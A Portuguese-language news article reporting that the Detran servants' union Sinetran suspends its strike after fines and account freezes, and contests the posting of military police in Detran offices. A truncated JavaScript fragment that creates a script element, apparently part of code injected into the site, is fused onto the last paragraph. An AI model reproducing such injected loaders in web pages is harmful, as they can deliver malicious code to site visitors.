Capa / Cidades / Após queda-de-braço, Sinetran suspende greve e volta a negociar

Após queda-de-braço, Sinetran suspende greve e volta a negociar

greveRDNews

Com bloqueio na conta de quase R$ 1 milhão, multa diária de R$ 200 mil, cortes de ponto e sem negociação com o Governo, o Sindicato dos Servidores do Detran resolveu suspender a greve para tentar dialogar com a gestão de Pedro Taques (PSDB).

Após uma longa queda-de-braço, com a greve declarada ilegal, os servidores do Detran se viram acuados e encerraram a paralisação. Em nota, o sindicato informou que atendeu uma reivindicação dos deputados, que buscam intermediar o diálogo com o Governo.

Isto porque, conforme já havia sido anunciado pelo secretário-chefe da Casa Civil, Paulo Taques, não haveria negociação caso a greve não fosse suspensa. Eles retomam as atividades nesta quarta (9). O governador já ponderou que tem cumprido o acordo feito com o sindicato, dentre os itens, a convocação de 30 aprovados no concurso público realizado pelo Estado. A nomeação foi publicada no diário oficial na semana passada.

Porém, a presidente do Sinetran, Daiane Renner, diz que a categoria luta para, além da nomeação dos concursados, a publicação do manual de procedimentos, melhoria na infraestrutura e na segurança das unidades, implementação da política de saúde e segurança do trabalhador.

O sindicato também se posicionou contrário à imposição do governo de colocar policiais militares para ocupar os postos no Detran, pois estaria retirando os agentes das ruas e desviando-os da função, fato que violaria até mesmo o princípio do concurso público.

“Visto que irão cumprir funções como civis sendo que há aprovados aguardando pelas nomeações para desempenhar esse trabalho, um absurdo!”, comenta Renner.

Daiane questiona também o investimento que será feito em um treinamento de apenas dois dias para esses policiais, para exercerem funções que, conforme o Código de Trânsito Brasileiro (CTB), são exclusivas dos profissionais do Sistema Nacional de Trânsito, que são os servidores concursados para tal. “Ninguém está acima da lei, a Constituição Federal e o CTB devem ser cumpridos”, comenta Daiane.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top